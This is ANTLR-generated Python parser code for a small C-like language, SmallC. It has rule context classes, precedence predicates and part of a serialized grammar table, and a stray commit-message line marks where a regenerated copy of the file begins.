self.enterRule(localctx, 90, self.RULE_pointer)
try:
self.enterOuterAlt(localctx, 1)
self.state = 538
self.match(SmallCParser.T__11)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TypeDeclarationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def TYPECHAR(self):
return self.getToken(SmallCParser.TYPECHAR, 0)
def TYPEFLOAT(self):
return self.getToken(SmallCParser.TYPEFLOAT, 0)
def TYPEINT(self):
return self.getToken(SmallCParser.TYPEINT, 0)
def TYPEVOID(self):
return self.getToken(SmallCParser.TYPEVOID, 0)
def getRuleIndex(self):
return SmallCParser.RULE_typeDeclaration
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTypeDeclaration" ):
listener.enterTypeDeclaration(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTypeDeclaration" ):
listener.exitTypeDeclaration(self)
def typeDeclaration(self):
localctx = SmallCParser.TypeDeclarationContext(self, self._ctx, self.state)
self.enterRule(localctx, 92, self.RULE_typeDeclaration)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 540
_la = self._input.LA(1)
if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID))) != 0)):
self._errHandler.recoverInline(self)
else:
self.consume()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FloatLiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def FLOAT(self):
return self.getToken(SmallCParser.FLOAT, 0)
def getRuleIndex(self):
return SmallCParser.RULE_floatLiteral
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFloatLiteral" ):
listener.enterFloatLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFloatLiteral" ):
listener.exitFloatLiteral(self)
def floatLiteral(self):
localctx = SmallCParser.FloatLiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 94, self.RULE_floatLiteral)
try:
self.enterOuterAlt(localctx, 1)
self.state = 542
self.match(SmallCParser.FLOAT)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IntegerLiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def INTEGER(self):
return self.getToken(SmallCParser.INTEGER, 0)
def getRuleIndex(self):
return SmallCParser.RULE_integerLiteral
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIntegerLiteral" ):
listener.enterIntegerLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIntegerLiteral" ):
listener.exitIntegerLiteral(self)
def integerLiteral(self):
localctx = SmallCParser.IntegerLiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 96, self.RULE_integerLiteral)
try:
self.enterOuterAlt(localctx, 1)
self.state = 544
self.match(SmallCParser.INTEGER)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CharacterLiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CHARACTER(self):
return self.getToken(SmallCParser.CHARACTER, 0)
def getRuleIndex(self):
return SmallCParser.RULE_characterLiteral
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCharacterLiteral" ):
listener.enterCharacterLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCharacterLiteral" ):
listener.exitCharacterLiteral(self)
def characterLiteral(self):
localctx = SmallCParser.CharacterLiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 98, self.RULE_characterLiteral)
try:
self.enterOuterAlt(localctx, 1)
self.state = 546
self.match(SmallCParser.CHARACTER)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StringLiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def STRING(self):
return self.getToken(SmallCParser.STRING, 0)
def getRuleIndex(self):
return SmallCParser.RULE_stringLiteral
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStringLiteral" ):
listener.enterStringLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStringLiteral" ):
listener.exitStringLiteral(self)
def stringLiteral(self):
localctx = SmallCParser.StringLiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 100, self.RULE_stringLiteral)
try:
self.enterOuterAlt(localctx, 1)
self.state = 548
self.match(SmallCParser.STRING)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
if self._predicates == None:
self._predicates = dict()
self._predicates[3] = self.oplevel12_sempred
self._predicates[4] = self.oplevel11_sempred
self._predicates[8] = self.oplevel7_sempred
self._predicates[9] = self.oplevel6_sempred
self._predicates[11] = self.oplevel4_sempred
self._predicates[12] = self.oplevel3_sempred
self._predicates[14] = self.oplevel1_sempred
pred = self._predicates.get(ruleIndex, None)
if pred is None:
raise Exception("No predicate with index:" + str(ruleIndex))
else:
return pred(localctx, predIndex)
def oplevel12_sempred(self, localctx:Oplevel12Context, predIndex:int):
if predIndex == 0:
return self.precpred(self._ctx, 2)
def oplevel11_sempred(self, localctx:Oplevel11Context, predIndex:int):
if predIndex == 1:
return self.precpred(self._ctx, 2)
def oplevel7_sempred(self, localctx:Oplevel7Context, predIndex:int):
if predIndex == 2:
return self.precpred(self._ctx, 3)
if predIndex == 3:
return self.precpred(self._ctx, 2)
def oplevel6_sempred(self, localctx:Oplevel6Context, predIndex:int):
if predIndex == 4:
return self.precpred(self._ctx, 5)
if predIndex == 5:
return self.precpred(self._ctx, 4)
if predIndex == 6:
return self.precpred(self._ctx, 3)
if predIndex == 7:
return self.precpred(self._ctx, 2)
def oplevel4_sempred(self, localctx:Oplevel4Context, predIndex:int):
if predIndex == 8:
return self.precpred(self._ctx, 3)
if predIndex == 9:
return self.precpred(self._ctx, 2)
def oplevel3_sempred(self, localctx:Oplevel3Context, predIndex:int):
if predIndex == 10:
return self.precpred(self._ctx, 4)
if predIndex == 11:
return self.precpred(self._ctx, 3)
if predIndex == 12:
return self.precpred(self._ctx, 2)
def oplevel1_sempred(self, localctx:Oplevel1Context, predIndex:int):
if predIndex == 13:
return self.precpred(self._ctx, 9)
if predIndex == 14:
return self.precpred(self._ctx, 8)
if predIndex == 15:
return self.precpred(self._ctx, 7)
regenerated SmallCParser.py after atom changed it
# Generated from SmallC.g4 by ANTLR 4.5.3
# encoding: utf-8
from antlr4 import *
from io import StringIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u0430\ud6d1\u8206\uad2d\u4417\uaef1\u8d80\uaadd\38")
buf.write("\u0229\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36")
buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%\4&\t")
buf.write("&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.\t.\4")
buf.write("/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64\t\64")
buf.write("\3\2\3\2\3\3\3\3\3\3\3\3\3\3\5\3p\n\3\3\4\3\4\3\4\3\4")
buf.write("\3\4\3\4\3\4\5\4y\n\4\3\5\3\5\3\5\3\5\3\5\3\5\7\5\u0081")
buf.write("\n\5\f\5\16\5\u0084\13\5\3\6\3\6\3\6\3\6\3\6\3\6\7\6\u008c")
buf.write("\n\6\f\6\16\6\u008f\13\6\3\7\3\7\3\b\3\b\3\t\3\t\3\n\3")
buf.write("\n\3\n\3\n\3\n\3\n\3\n\3\n\3\n\7\n\u00a0\n\n\f\n\16\n")
buf.write("\u00a3\13\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3")
buf.write("\13\3\13\3\13\3\13\3\13\3\13\3\13\7\13\u00b4\n\13\f\13")
buf.write("\16\13\u00b7\13\13\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r")
buf.write("\3\r\3\r\7\r\u00c4\n\r\f\r\16\r\u00c7\13\r\3\16\3\16\3")
buf.write("\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\16\7\16")
buf.write("\u00d5\n\16\f\16\16\16\u00d8\13\16\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\3\17\3\17\3\17\3\17\5\17\u00ef\n\17\3\20\3")
buf.write("\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\5\20\u00fb")
buf.write("\n\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\7\20")
buf.write("\u0106\n\20\f\20\16\20\u0109\13\20\3\21\3\21\3\21\3\21")
buf.write("\3\21\3\21\7\21\u0111\n\21\f\21\16\21\u0114\13\21\3\22")
buf.write("\3\22\3\22\3\22\3\22\3\22\3\22\5\22\u011d\n\22\3\23\3")
buf.write("\23\3\23\3\23\3\24\3\24\3\25\6\25\u0126\n\25\r\25\16\25")
buf.write("\u0127\3\25\7\25\u012b\n\25\f\25\16\25\u012e\13\25\3\25")
buf.write("\3\25\3\25\3\25\3\25\3\25\3\26\6\26\u0137\n\26\r\26\16")
buf.write("\26\u0138\3\26\7\26\u013c\n\26\f\26\16\26\u013f\13\26")
buf.write("\3\26\3\26\3\26\3\26\3\26\3\26\3\27\3\27\3\27\3\27\7\27")
buf.write("\u014b\n\27\f\27\16\27\u014e\13\27\3\27\5\27\u0151\n\27")
buf.write("\3\30\6\30\u0154\n\30\r\30\16\30\u0155\3\30\7\30\u0159")
buf.write("\n\30\f\30\16\30\u015c\13\30\3\30\5\30\u015f\n\30\3\30")
buf.write("\5\30\u0162\n\30\3\31\3\31\5\31\u0166\n\31\3\32\3\32\5")
buf.write("\32\u016a\n\32\3\32\3\32\3\33\3\33\7\33\u0170\n\33\f\33")
buf.write("\16\33\u0173\13\33\3\33\3\33\3\34\3\34\3\34\3\34\3\34")
buf.write("\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\3\34\5\34")
buf.write("\u0186\n\34\3\35\3\35\3\35\3\35\3\35\3\35\3\35\5\35\u018f")
buf.write("\n\35\3\36\3\36\3\36\3\36\3\36\3\36\5\36\u0197\n\36\3")
buf.write("\37\3\37\3\37\3 \3 \3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3!\3")
buf.write("!\3\"\3\"\3\"\3\"\5\"\u01ae\n\"\3\"\3\"\3\"\3\"\3\"\3")
buf.write("\"\3\"\3#\6#\u01b8\n#\r#\16#\u01b9\3#\3#\3#\7#\u01bf\n")
buf.write("#\f#\16#\u01c2\13#\3$\3$\5$\u01c6\n$\3%\3%\3&\3&\3&\3")
buf.write("&\3&\5&\u01cf\n&\3&\3&\3&\5&\u01d4\n&\5&\u01d6\n&\3\'")
buf.write("\3\'\3\'\3\'\3\'\3\'\5\'\u01de\n\'\5\'\u01e0\n\'\3(\3")
buf.write("(\3(\3(\3(\7(\u01e7\n(\f(\16(\u01ea\13(\3(\3(\6(\u01ee")
buf.write("\n(\r(\16(\u01ef\3(\3(\5(\u01f4\n(\3)\3)\3)\3)\7)\u01fa")
buf.write("\n)\f)\16)\u01fd\13)\5)\u01ff\n)\3)\3)\5)\u0203\n)\3*")
buf.write("\3*\5*\u0207\n*\3+\3+\3+\7+\u020c\n+\f+\16+\u020f\13+")
buf.write("\3+\5+\u0212\n+\3,\3,\3,\3,\3,\3-\3-\3.\3.\3/\3/\3\60")
buf.write("\3\60\3\61\3\61\3\62\3\62\3\63\3\63\3\64\3\64\3\64\2\t")
buf.write("\b\n\22\24\30\32\36\65\2\4\6\b\n\f\16\20\22\24\26\30\32")
buf.write("\34\36 \"$&(*,.\60\62\64\668:<>@BDFHJLNPRTVXZ\\^`bdf\2")
buf.write("\3\3\2\"%\u024a\2h\3\2\2\2\4o\3\2\2\2\6x\3\2\2\2\bz\3")
buf.write("\2\2\2\n\u0085\3\2\2\2\f\u0090\3\2\2\2\16\u0092\3\2\2")
buf.write("\2\20\u0094\3\2\2\2\22\u0096\3\2\2\2\24\u00a4\3\2\2\2")
buf.write("\26\u00b8\3\2\2\2\30\u00ba\3\2\2\2\32\u00c8\3\2\2\2\34")
buf.write("\u00ee\3\2\2\2\36\u00fa\3\2\2\2 \u0112\3\2\2\2\"\u011c")
buf.write("\3\2\2\2$\u011e\3\2\2\2&\u0122\3\2\2\2(\u0125\3\2\2\2")
buf.write("*\u0136\3\2\2\2,\u0150\3\2\2\2.\u0153\3\2\2\2\60\u0163")
buf.write("\3\2\2\2\62\u0167\3\2\2\2\64\u016d\3\2\2\2\66\u0185\3")
buf.write("\2\2\28\u018e\3\2\2\2:\u0190\3\2\2\2<\u0198\3\2\2\2>\u019b")
buf.write("\3\2\2\2@\u01a1\3\2\2\2B\u01a9\3\2\2\2D\u01b7\3\2\2\2")
buf.write("F\u01c5\3\2\2\2H\u01c7\3\2\2\2J\u01d5\3\2\2\2L\u01df\3")
buf.write("\2\2\2N\u01f3\3\2\2\2P\u0202\3\2\2\2R\u0204\3\2\2\2T\u0211")
buf.write("\3\2\2\2V\u0213\3\2\2\2X\u0218\3\2\2\2Z\u021a\3\2\2\2")
buf.write("\\\u021c\3\2\2\2^\u021e\3\2\2\2`\u0220\3\2\2\2b\u0222")
buf.write("\3\2\2\2d\u0224\3\2\2\2f\u0226\3\2\2\2hi\5\4\3\2i\3\3")
buf.write("\2\2\2jk\5\6\4\2kl\7\3\2\2lm\5\4\3\2mp\3\2\2\2np\5\6\4")
buf.write("\2oj\3\2\2\2on\3\2\2\2p\5\3\2\2\2qr\5\b\5\2rs\7\4\2\2")
buf.write("st\5\b\5\2tu\7\5\2\2uv\5\6\4\2vy\3\2\2\2wy\5\b\5\2xq\3")
buf.write("\2\2\2xw\3\2\2\2y\7\3\2\2\2z{\b\5\1\2{|\5\n\6\2|\u0082")
buf.write("\3\2\2\2}~\f\4\2\2~\177\7\6\2\2\177\u0081\5\n\6\2\u0080")
buf.write("}\3\2\2\2\u0081\u0084\3\2\2\2\u0082\u0080\3\2\2\2\u0082")
buf.write("\u0083\3\2\2\2\u0083\t\3\2\2\2\u0084\u0082\3\2\2\2\u0085")
buf.write("\u0086\b\6\1\2\u0086\u0087\5\22\n\2\u0087\u008d\3\2\2")
buf.write("\2\u0088\u0089\f\4\2\2\u0089\u008a\7\7\2\2\u008a\u008c")
buf.write("\5\22\n\2\u008b\u0088\3\2\2\2\u008c\u008f\3\2\2\2\u008d")
buf.write("\u008b\3\2\2\2\u008d\u008e\3\2\2\2\u008e\13\3\2\2\2\u008f")
buf.write("\u008d\3\2\2\2\u0090\u0091\5\16\b\2\u0091\r\3\2\2\2\u0092")
buf.write("\u0093\5\20\t\2\u0093\17\3\2\2\2\u0094\u0095\5\22\n\2")
buf.write("\u0095\21\3\2\2\2\u0096\u0097\b\n\1\2\u0097\u0098\5\24")
buf.write("\13\2\u0098\u00a1\3\2\2\2\u0099\u009a\f\5\2\2\u009a\u009b")
buf.write("\7\b\2\2\u009b\u00a0\5\24\13\2\u009c\u009d\f\4\2\2\u009d")
buf.write("\u009e\7\t\2\2\u009e\u00a0\5\24\13\2\u009f\u0099\3\2\2")
buf.write("\2\u009f\u009c\3\2\2\2\u00a0\u00a3\3\2\2\2\u00a1\u009f")
buf.write("\3\2\2\2\u00a1\u00a2\3\2\2\2\u00a2\23\3\2\2\2\u00a3\u00a1")
buf.write("\3\2\2\2\u00a4\u00a5\b\13\1\2\u00a5\u00a6\5\30\r\2\u00a6")
buf.write("\u00b5\3\2\2\2\u00a7\u00a8\f\7\2\2\u00a8\u00a9\7\33\2")
buf.write("\2\u00a9\u00b4\5\30\r\2\u00aa\u00ab\f\6\2\2\u00ab\u00ac")
buf.write("\7\n\2\2\u00ac\u00b4\5\30\r\2\u00ad\u00ae\f\5\2\2\u00ae")
buf.write("\u00af\7\34\2\2\u00af\u00b4\5\30\r\2\u00b0\u00b1\f\4\2")
buf.write("\2\u00b1\u00b2\7\13\2\2\u00b2\u00b4\5\30\r\2\u00b3\u00a7")
buf.write("\3\2\2\2\u00b3\u00aa\3\2\2\2\u00b3\u00ad\3\2\2\2\u00b3")
buf.write("\u00b0\3\2\2\2\u00b4\u00b7\3\2\2\2\u00b5\u00b3\3\2\2\2")
buf.write("\u00b5\u00b6\3\2\2\2\u00b6\25\3\2\2\2\u00b7\u00b5\3\2")
buf.write("\2\2\u00b8\u00b9\5\30\r\2\u00b9\27\3\2\2\2\u00ba\u00bb")
buf.write("\b\r\1\2\u00bb\u00bc\5\32\16\2\u00bc\u00c5\3\2\2\2\u00bd")
buf.write("\u00be\f\5\2\2\u00be\u00bf\7\f\2\2\u00bf\u00c4\5\32\16")
buf.write("\2\u00c0\u00c1\f\4\2\2\u00c1\u00c2\7\r\2\2\u00c2\u00c4")
buf.write("\5\32\16\2\u00c3\u00bd\3\2\2\2\u00c3\u00c0\3\2\2\2\u00c4")
buf.write("\u00c7\3\2\2\2\u00c5\u00c3\3\2\2\2\u00c5\u00c6\3\2\2\2")
buf.write("\u00c6\31\3\2\2\2\u00c7\u00c5\3\2\2\2\u00c8\u00c9\b\16")
buf.write("\1\2\u00c9\u00ca\5\34\17\2\u00ca\u00d6\3\2\2\2\u00cb\u00cc")
buf.write("\f\6\2\2\u00cc\u00cd\7\16\2\2\u00cd\u00d5\5\34\17\2\u00ce")
buf.write("\u00cf\f\5\2\2\u00cf\u00d0\7\17\2\2\u00d0\u00d5\5\34\17")
buf.write("\2\u00d1\u00d2\f\4\2\2\u00d2\u00d3\7\20\2\2\u00d3\u00d5")
buf.write("\5\34\17\2\u00d4\u00cb\3\2\2\2\u00d4\u00ce\3\2\2\2\u00d4")
buf.write("\u00d1\3\2\2\2\u00d5\u00d8\3\2\2\2\u00d6\u00d4\3\2\2\2")
buf.write("\u00d6\u00d7\3\2\2\2\u00d7\33\3\2\2\2\u00d8\u00d6\3\2")
buf.write("\2\2\u00d9\u00da\7\21\2\2\u00da\u00ef\5\34\17\2\u00db")
buf.write("\u00dc\7\22\2\2\u00dc\u00ef\5\34\17\2\u00dd\u00de\7\f")
buf.write("\2\2\u00de\u00ef\5\34\17\2\u00df\u00e0\7\r\2\2\u00e0\u00ef")
buf.write("\5\34\17\2\u00e1\u00e2\7\23\2\2\u00e2\u00ef\5\36\20\2")
buf.write("\u00e3\u00e4\7\16\2\2\u00e4\u00ef\5\34\17\2\u00e5\u00e6")
buf.write("\7\24\2\2\u00e6\u00ef\5\34\17\2\u00e7\u00ef\5V,\2\u00e8")
buf.write("\u00e9\7\31\2\2\u00e9\u00ea\5^\60\2\u00ea\u00eb\7\32\2")
buf.write("\2\u00eb\u00ec\5\34\17\2\u00ec\u00ef\3\2\2\2\u00ed\u00ef")
buf.write("\5\36\20\2\u00ee\u00d9\3\2\2\2\u00ee\u00db\3\2\2\2\u00ee")
buf.write("\u00dd\3\2\2\2\u00ee\u00df\3\2\2\2\u00ee\u00e1\3\2\2\2")
buf.write("\u00ee\u00e3\3\2\2\2\u00ee\u00e5\3\2\2\2\u00ee\u00e7\3")
buf.write("\2\2\2\u00ee\u00e8\3\2\2\2\u00ee\u00ed\3\2\2\2\u00ef\35")
buf.write("\3\2\2\2\u00f0\u00f1\b\20\1\2\u00f1\u00fb\5X-\2\u00f2")
buf.write("\u00fb\5`\61\2\u00f3\u00fb\5b\62\2\u00f4\u00fb\5d\63\2")
buf.write("\u00f5\u00fb\5f\64\2\u00f6\u00f7\7\31\2\2\u00f7\u00f8")
buf.write("\58\35\2\u00f8\u00f9\7\32\2\2\u00f9\u00fb\3\2\2\2\u00fa")
buf.write("\u00f0\3\2\2\2\u00fa\u00f2\3\2\2\2\u00fa\u00f3\3\2\2\2")
buf.write("\u00fa\u00f4\3\2\2\2\u00fa\u00f5\3\2\2\2\u00fa\u00f6\3")
buf.write("\2\2\2\u00fb\u0107\3\2\2\2\u00fc\u00fd\f\13\2\2\u00fd")
buf.write("\u0106\7\21\2\2\u00fe\u00ff\f\n\2\2\u00ff\u0106\7\22\2")
buf.write("\2\u0100\u0101\f\t\2\2\u0101\u0102\7\37\2\2\u0102\u0103")
buf.write("\58\35\2\u0103\u0104\7 \2\2\u0104\u0106\3\2\2\2\u0105")
buf.write("\u00fc\3\2\2\2\u0105\u00fe\3\2\2\2\u0105\u0100\3\2\2\2")
buf.write("\u0106\u0109\3\2\2\2\u0107\u0105\3\2\2\2\u0107\u0108\3")
buf.write("\2\2\2\u0108\37\3\2\2\2\u0109\u0107\3\2\2\2\u010a\u0111")
buf.write("\5\"\22\2\u010b\u0111\5(\25\2\u010c\u0111\5*\26\2\u010d")
buf.write("\u010e\5D#\2\u010e\u010f\7\25\2\2\u010f\u0111\3\2\2\2")
buf.write("\u0110\u010a\3\2\2\2\u0110\u010b\3\2\2\2\u0110\u010c\3")
buf.write("\2\2\2\u0110\u010d\3\2\2\2\u0111\u0114\3\2\2\2\u0112\u0110")
buf.write("\3\2\2\2\u0112\u0113\3\2\2\2\u0113!\3\2\2\2\u0114\u0112")
buf.write("\3\2\2\2\u0115\u0116\7\26\2\2\u0116\u0117\7\33\2\2\u0117")
buf.write("\u0118\5$\23\2\u0118\u0119\7\34\2\2\u0119\u011d\3\2\2")
buf.write("\2\u011a\u011b\7\26\2\2\u011b\u011d\5&\24\2\u011c\u0115")
buf.write("\3\2\2\2\u011c\u011a\3\2\2\2\u011d#\3\2\2\2\u011e\u011f")
buf.write("\5Z.\2\u011f\u0120\7\27\2\2\u0120\u0121\5Z.\2\u0121%\3")
buf.write("\2\2\2\u0122\u0123\5f\64\2\u0123\'\3\2\2\2\u0124\u0126")
buf.write("\5F$\2\u0125\u0124\3\2\2\2\u0126\u0127\3\2\2\2\u0127\u0125")
buf.write("\3\2\2\2\u0127\u0128\3\2\2\2\u0128\u012c\3\2\2\2\u0129")
buf.write("\u012b\5\60\31\2\u012a\u0129\3\2\2\2\u012b\u012e\3\2\2")
buf.write("\2\u012c\u012a\3\2\2\2\u012c\u012d\3\2\2\2\u012d\u012f")
buf.write("\3\2\2\2\u012e\u012c\3\2\2\2\u012f\u0130\5Z.\2\u0130\u0131")
buf.write("\7\31\2\2\u0131\u0132\5,\27\2\u0132\u0133\7\32\2\2\u0133")
buf.write("\u0134\7\25\2\2\u0134)\3\2\2\2\u0135\u0137\5F$\2\u0136")
buf.write("\u0135\3\2\2\2\u0137\u0138\3\2\2\2\u0138\u0136\3\2\2\2")
buf.write("\u0138\u0139\3\2\2\2\u0139\u013d\3\2\2\2\u013a\u013c\5")
buf.write("\60\31\2\u013b\u013a\3\2\2\2\u013c\u013f\3\2\2\2\u013d")
buf.write("\u013b\3\2\2\2\u013d\u013e\3\2\2\2\u013e\u0140\3\2\2\2")
buf.write("\u013f\u013d\3\2\2\2\u0140\u0141\5Z.\2\u0141\u0142\7\31")
buf.write("\2\2\u0142\u0143\5,\27\2\u0143\u0144\7\32\2\2\u0144\u0145")
buf.write("\5\64\33\2\u0145+\3\2\2\2\u0146\u0151\3\2\2\2\u0147\u014c")
buf.write("\5.\30\2\u0148\u0149\7\30\2\2\u0149\u014b\5.\30\2\u014a")
buf.write("\u0148\3\2\2\2\u014b\u014e\3\2\2\2\u014c\u014a\3\2\2\2")
buf.write("\u014c\u014d\3\2\2\2\u014d\u0151\3\2\2\2\u014e\u014c\3")
buf.write("\2\2\2\u014f\u0151\3\2\2\2\u0150\u0146\3\2\2\2\u0150\u0147")
buf.write("\3\2\2\2\u0150\u014f\3\2\2\2\u0151-\3\2\2\2\u0152\u0154")
buf.write("\5F$\2\u0153\u0152\3\2\2\2\u0154\u0155\3\2\2\2\u0155\u0153")
buf.write("\3\2\2\2\u0155\u0156\3\2\2\2\u0156\u015a\3\2\2\2\u0157")
buf.write("\u0159\5\60\31\2\u0158\u0157\3\2\2\2\u0159\u015c\3\2\2")
buf.write("\2\u015a\u0158\3\2\2\2\u015a\u015b\3\2\2\2\u015b\u015e")
buf.write("\3\2\2\2\u015c\u015a\3\2\2\2\u015d\u015f\5Z.\2\u015e\u015d")
buf.write("\3\2\2\2\u015e\u015f\3\2\2\2\u015f\u0161\3\2\2\2\u0160")
buf.write("\u0162\5\62\32\2\u0161\u0160\3\2\2\2\u0161\u0162\3\2\2")
buf.write("\2\u0162/\3\2\2\2\u0163\u0165\5\\/\2\u0164\u0166\5H%\2")
buf.write("\u0165\u0164\3\2\2\2\u0165\u0166\3\2\2\2\u0166\61\3\2")
buf.write("\2\2\u0167\u0169\7\37\2\2\u0168\u016a\58\35\2\u0169\u0168")
buf.write("\3\2\2\2\u0169\u016a\3\2\2\2\u016a\u016b\3\2\2\2\u016b")
buf.write("\u016c\7 \2\2\u016c\63\3\2\2\2\u016d\u0171\7\35\2\2\u016e")
buf.write("\u0170\5\66\34\2\u016f\u016e\3\2\2\2\u0170\u0173\3\2\2")
buf.write("\2\u0171\u016f\3\2\2\2\u0171\u0172\3\2\2\2\u0172\u0174")
buf.write("\3\2\2\2\u0173\u0171\3\2\2\2\u0174\u0175\7\36\2\2\u0175")
buf.write("\65\3\2\2\2\u0176\u0186\5\64\33\2\u0177\u0186\5:\36\2")
buf.write("\u0178\u0186\5> \2\u0179\u0186\5@!\2\u017a\u0186\5B\"")
buf.write("\2\u017b\u017c\58\35\2\u017c\u017d\7\25\2\2\u017d\u0186")
buf.write("\3\2\2\2\u017e\u017f\5D#\2\u017f\u0180\7\25\2\2\u0180")
buf.write("\u0186\3\2\2\2\u0181\u0182\5R*\2\u0182\u0183\7\25\2\2")
buf.write("\u0183\u0186\3\2\2\2\u0184\u0186\7\25\2\2\u0185\u0176")
buf.write("\3\2\2\2\u0185\u0177\3\2\2\2\u0185\u0178\3\2\2\2\u0185")
buf.write("\u0179\3\2\2\2\u0185\u017a\3\2\2\2\u0185\u017b\3\2\2\2")
buf.write("\u0185\u017e\3\2\2\2\u0185\u0181\3\2\2\2\u0185\u0184\3")
buf.write("\2\2\2\u0186\67\3\2\2\2\u0187\u018f\5X-\2\u0188\u018f")
buf.write("\5`\61\2\u0189\u018f\5b\62\2\u018a\u018f\5d\63\2\u018b")
buf.write("\u018f\5f\64\2\u018c\u018f\5V,\2\u018d\u018f\5\4\3\2\u018e")
buf.write("\u0187\3\2\2\2\u018e\u0188\3\2\2\2\u018e\u0189\3\2\2\2")
buf.write("\u018e\u018a\3\2\2\2\u018e\u018b\3\2\2\2\u018e\u018c\3")
buf.write("\2\2\2\u018e\u018d\3\2\2\2\u018f9\3\2\2\2\u0190\u0191")
buf.write("\7)\2\2\u0191\u0192\7\31\2\2\u0192\u0193\58\35\2\u0193")
buf.write("\u0194\7\32\2\2\u0194\u0196\5\66\34\2\u0195\u0197\5<\37")
buf.write("\2\u0196\u0195\3\2\2\2\u0196\u0197\3\2\2\2\u0197;\3\2")
buf.write("\2\2\u0198\u0199\7*\2\2\u0199\u019a\5\66\34\2\u019a=\3")
buf.write("\2\2\2\u019b\u019c\7,\2\2\u019c\u019d\7\31\2\2\u019d\u019e")
buf.write("\58\35\2\u019e\u019f\7\32\2\2\u019f\u01a0\5\66\34\2\u01a0")
buf.write("?\3\2\2\2\u01a1\u01a2\7+\2\2\u01a2\u01a3\5\64\33\2\u01a3")
buf.write("\u01a4\7,\2\2\u01a4\u01a5\7\31\2\2\u01a5\u01a6\58\35\2")
buf.write("\u01a6\u01a7\7\32\2\2\u01a7\u01a8\7\25\2\2\u01a8A\3\2")
buf.write("\2\2\u01a9\u01aa\7-\2\2\u01aa\u01ad\7\31\2\2\u01ab\u01ae")
buf.write("\5D#\2\u01ac\u01ae\5X-\2\u01ad\u01ab\3\2\2\2\u01ad\u01ac")
buf.write("\3\2\2\2\u01ae\u01af\3\2\2\2\u01af\u01b0\7\25\2\2\u01b0")
buf.write("\u01b1\58\35\2\u01b1\u01b2\7\25\2\2\u01b2\u01b3\58\35")
buf.write("\2\u01b3\u01b4\7\32\2\2\u01b4\u01b5\5\66\34\2\u01b5C\3")
buf.write("\2\2\2\u01b6\u01b8\5F$\2\u01b7\u01b6\3\2\2\2\u01b8\u01b9")
buf.write("\3\2\2\2\u01b9\u01b7\3\2\2\2\u01b9\u01ba\3\2\2\2\u01ba")
buf.write("\u01bb\3\2\2\2\u01bb\u01c0\5J&\2\u01bc\u01bd\7\30\2\2")
buf.write("\u01bd\u01bf\5J&\2\u01be\u01bc\3\2\2\2\u01bf\u01c2\3\2")
